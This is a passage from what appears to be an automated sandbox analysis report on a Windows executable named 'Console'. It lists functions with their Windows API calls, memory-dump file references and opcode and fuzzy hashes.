                                                                                                                                                                                                                            • Part of subcall function 0122CD40: LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 0122CE91
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: GetLastError.KERNEL32 ref: 0122CE9F
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: SetLastError.KERNEL32(00000000), ref: 0122CFD4
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 010979C5
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(?,00000000,?,00000000), ref: 010979DF
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 010979E6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Last$ModeThread$LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3861856538-0
                                                                                                                                                                                                                          • Opcode ID: 4ac375f60ba0a99fbab90946f7642607b79a66629bf3121c80487f8bf83bf4ca
                                                                                                                                                                                                                          • Instruction ID: 1098a53feb0f2f1dca26c0012cbc6eacdb13c50a9860ad6547ced310dc3b323a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ac375f60ba0a99fbab90946f7642607b79a66629bf3121c80487f8bf83bf4ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F014076900109AFCB20DF58D909B9EBFB8EB04721F11426EE911A33E0D7755914CB91
                                                                                                                                                                                                                          Function 01183040 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WerRegisterRuntimeExceptionModule.KERNEL32(00000000,00FC0000,?,7CAB6A82,03C16310,00000000), ref: 011831B8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • WATSON support: failed to register DAC dll with WerRegisterRuntimeExceptionModule, xrefs: 011832E4
                                                                                                                                                                                                                          • WATSON support: registered DAC dll with WerRegisterRuntimeExceptionModule, xrefs: 011832FD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionModuleRegisterRuntime
                                                                                                                                                                                                                          • String ID: WATSON support: failed to register DAC dll with WerRegisterRuntimeExceptionModule$WATSON support: registered DAC dll with WerRegisterRuntimeExceptionModule
                                                                                                                                                                                                                          • API String ID: 634786029-3965477652
                                                                                                                                                                                                                          • Opcode ID: 99ed4eaef51f41a6d0af9d4bfdfb1d93d1b868c53f1ba279ce7a378389a15cc8
                                                                                                                                                                                                                          • Instruction ID: 2be921274a751e0022800be1de954b39435cf5f96232ff58dedf74084b18643a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ed4eaef51f41a6d0af9d4bfdfb1d93d1b868c53f1ba279ce7a378389a15cc8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9516970D04668DBEB20DF28CD497EEBBB0EB14714F0082D9D818AB381EB755A84CF51
                                                                                                                                                                                                                          Function 010851E0 Relevance: 5.4, APIs: 4, Instructions: 367memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0107CB00: SleepEx.KERNEL32(0000000A,00000000,00000104,00000104,012CCD56), ref: 0107CB28
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 010855D0
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,000002CC), ref: 010855EB
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 01085643
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,0000000C), ref: 01085660
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess$Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 207374558-0
                                                                                                                                                                                                                          • Opcode ID: 42618c699c60bc0dd42b02dfdb956bfba162c0646820be570887efda1af0ef2e
                                                                                                                                                                                                                          • Instruction ID: 686cf2d441aea9a3da24698e0138106976621066198724915889d2843aa9f64e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42618c699c60bc0dd42b02dfdb956bfba162c0646820be570887efda1af0ef2e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 520233B0A01B02EFE325CF28D95878AFBF4BB09314F10861ED5A9AB380D7B56514CF91
                                                                                                                                                                                                                          Function 00FC2CD0 Relevance: 5.3, APIs: 4, Instructions: 296COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                            • Part of subcall function 0107FC00: LeaveCriticalSection.KERNEL32(0163EEE4,7CAB6A82,03C16310), ref: 0107FC9F
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EA20,?,?,?,?,?,?,?,?,00000000,?,?,C0000000,014B39CE), ref: 00FC2FAC
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EA04,?,?,?,?,?,?,?,?,00000000,?,?,C0000000,014B39CE), ref: 00FC2FD5
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EEB0,01647570,01647CF0,00000000), ref: 00FC3155
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647F34), ref: 00FC317E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Initialize$Heap$AllocateLeaveProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3913766473-0
                                                                                                                                                                                                                          • Opcode ID: 52823be5e153028094ee876997fcedb6981da6d28893df3d74a696a1e62683f0
                                                                                                                                                                                                                          • Instruction ID: aa8df83017d43534a5f42687070ea935712e90aadef7918be92859003bb85b6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52823be5e153028094ee876997fcedb6981da6d28893df3d74a696a1e62683f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D18FB0D0138ADFEB61DFA8DE097997AF0BB11314F20869CC455AB3C1E7B54A04EB65
                                                                                                                                                                                                                          Function 0122D020 Relevance: 4.6, APIs: 3, Instructions: 110fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FCF770: wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000004,00000000,7CAB6A82,?,?), ref: 00FCF7FC
                                                                                                                                                                                                                            • Part of subcall function 00FCB100: HeapFree.KERNEL32(00000000,?,7CAB6A82,?,00000000,014B563D,000000FF,?,01216CAC,?,0159EE14), ref: 00FCB143
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000080,00000000,?,?,00000000,?,00000000,00000000,00000000,7CAB6A82,00000000,00000000,00000000), ref: 0122D19C
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,7CAB6A82,00000000,00000000,00000000), ref: 0122D1AA
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 0122D2E0
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast$CreateFilewcscpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2733571464-0
                                                                                                                                                                                                                          • Opcode ID: 66d6816f94ecdc57374541263f3a8398466e45affae0ea40cc2e518957bee0e9
                                                                                                                                                                                                                          • Instruction ID: 73dcf69be692d8e940d3d63958f4e55cd0f250f0491342b4a6db027c6e648b0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66d6816f94ecdc57374541263f3a8398466e45affae0ea40cc2e518957bee0e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A511971801268EEDB20DFA4DD89BDDBBB4EB18314F2042D9E409A7291DB745F48CF51
                                                                                                                                                                                                                          Function 0122CD40 Relevance: 4.6, APIs: 3, Instructions: 107libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FCF770: wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000004,00000000,7CAB6A82,?,?), ref: 00FCF7FC
                                                                                                                                                                                                                            • Part of subcall function 00FCB100: HeapFree.KERNEL32(00000000,?,7CAB6A82,?,00000000,014B563D,000000FF,?,01216CAC,?,0159EE14), ref: 00FCB143
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 0122CE91
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0122CE9F
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 0122CFD4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$FreeHeapLibraryLoadwcscpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 479767642-0
                                                                                                                                                                                                                          • Opcode ID: 685ef63cc870da11f67166d73b771bd3ec31f4c74885ab3067c370160bedbb86
                                                                                                                                                                                                                          • Instruction ID: f97320c1641cd1aeab1ed2759d3e404fec75f9269ae0bc8d8faf8c41b8c190e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 685ef63cc870da11f67166d73b771bd3ec31f4c74885ab3067c370160bedbb86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F41097181526DAACB20DFA8DD89BDDBBB8EF18710F2041EAE409A3251DB745F44CF91
                                                                                                                                                                                                                          Function 012CE600 Relevance: 4.6, APIs: 3, Instructions: 92COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • GetActiveProcessorGroupCount.KERNEL32 ref: 012CE639
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,?,000000A1,?,?,?,014186CE,00FC0000,?,?,00000000), ref: 012CE670
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 012CE695
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$_errno$ActiveAllocateCountFreeGroupProcessProcessorfreemallocwcstoul
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3982342263-0
                                                                                                                                                                                                                          • Opcode ID: ed62e6878e0188c393a1da69b9acc642f317c9778244e2ddb9c305c8eae1f541
                                                                                                                                                                                                                          • Instruction ID: f3466df8724c56db8b9bf906ed106b8144b5aa644f4d0278b54f6f2ed90858fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed62e6878e0188c393a1da69b9acc642f317c9778244e2ddb9c305c8eae1f541
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7931A6B46302424FEB28AFA4AC1A7363AD5BB10B48F05136CDB458B7D5EF7584148B91
                                                                                                                                                                                                                          Function 01228200 Relevance: 4.6, APIs: 3, Instructions: 82COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 01228256
                                                                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 0122825D
                                                                                                                                                                                                                          • QueryInformationJobObject.KERNEL32(00000000,0000000F,?,00000008,00000000), ref: 01228294
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process_errno$AffinityCurrentFreeHeapInformationMaskObjectQuerywcstoul
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 286315805-0
                                                                                                                                                                                                                          • Opcode ID: 15fc368c1828b30389f95d1017f97fa22ad52b1352a176d7dc3217f9496eff0e
                                                                                                                                                                                                                          • Instruction ID: 55ec9e2bd5399a47ac8c6b499b6a5eb93135bf3265967d64a9cb992d5133cc5b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15fc368c1828b30389f95d1017f97fa22ad52b1352a176d7dc3217f9496eff0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70213B355246B2ABDB38CB5CCC44B7EB3E9EB42711F054629EA45D7289E730D844C7E2
                                                                                                                                                                                                                          Function 0122E1F0 Relevance: 4.6, APIs: 3, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,0141859A,?,00000000), ref: 0122E21D
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000028,?,?,?,0141859A,?,00000000), ref: 0122E23B
                                                                                                                                                                                                                          • CreateFileMappingA.KERNEL32(000000FF,00000000,04000040,00000000,000000FF,00000000), ref: 0122E2D5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$_errno$AllocCreateFileFreeMappingProcesswcstoul
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4279892807-0
                                                                                                                                                                                                                          • Opcode ID: cd93b2f2aa8406ec89fa7aa30f214d2d9854d004cc7e69a6fb877e17aee12e94
